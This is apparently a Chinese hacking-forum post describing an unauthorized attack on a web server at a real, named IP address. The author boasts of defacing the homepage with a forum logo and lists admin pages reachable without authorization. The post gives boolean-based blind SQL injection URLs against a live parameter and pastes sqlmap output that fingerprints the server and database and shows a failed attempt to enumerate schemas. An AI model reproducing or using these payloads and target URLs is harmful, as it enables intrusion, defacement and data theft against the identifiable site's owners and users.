首页貌似被我插logo插坏了........
越权
http://122.224.8.3/admin/ADedit.aspx
http://122.224.8.3/admin/knowledge.aspx
以下插入myhack58的logo做证明
地址
http://122.224.8.3/Default_20080624.aspx
一处sql盲注
http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=1
返回正常
http://122.224.8.3/nbb/wiki.aspx?wid=3034%20and%201=2
返回错误
[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual
consent is illegal. It is the end user's responsibility to obey all applicable
local, state and federal laws. Authors assume no liability and are not responsib
le for any misuse or damage caused by this program
[*] starting at 21:32:32
[21:32:32] [INFO] using 'C:\Users\Administrator\Desktop\渗透工具\sqlmap GUI汉化
版\rar\output\122.224.8.3\session' as session file
[21:32:32] [INFO] resuming back-end DBMS 'oracle' from session file
[21:32:32] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: wid
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: wid=3034 AND 2979=2979
---
[21:32:33] [INFO] the back-end DBMS is Oracle
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Oracle
[21:32:33] [WARNING] schema names are going to be used on Oracle for enumeration
as the counterpart to database names on other DBMSes
[21:32:33] [INFO] fetching database (schema) names
[21:32:33] [INFO] fetching number of databases
[21:32:33] [WARNING] running in a single-thread mode. Please consider usage of o
ption '--threads' for faster data retrieval
[21:32:33] [INFO] retrieved:
[21:32:37] [ERROR] unable to retrieve the number of databases
[21:32:37] [INFO] falling back to current database
[21:32:37] [INFO] fetching current database
[21:32:37] [INFO] retrieved:
[21:32:43] [CRITICAL] unable to retrieve the database names
[21:32:43] [WARNING] HTTP error codes detected during testing:
500 (Internal Server Error) - 10 times
跑不出数据库,确实存在注入点.....有点无奈....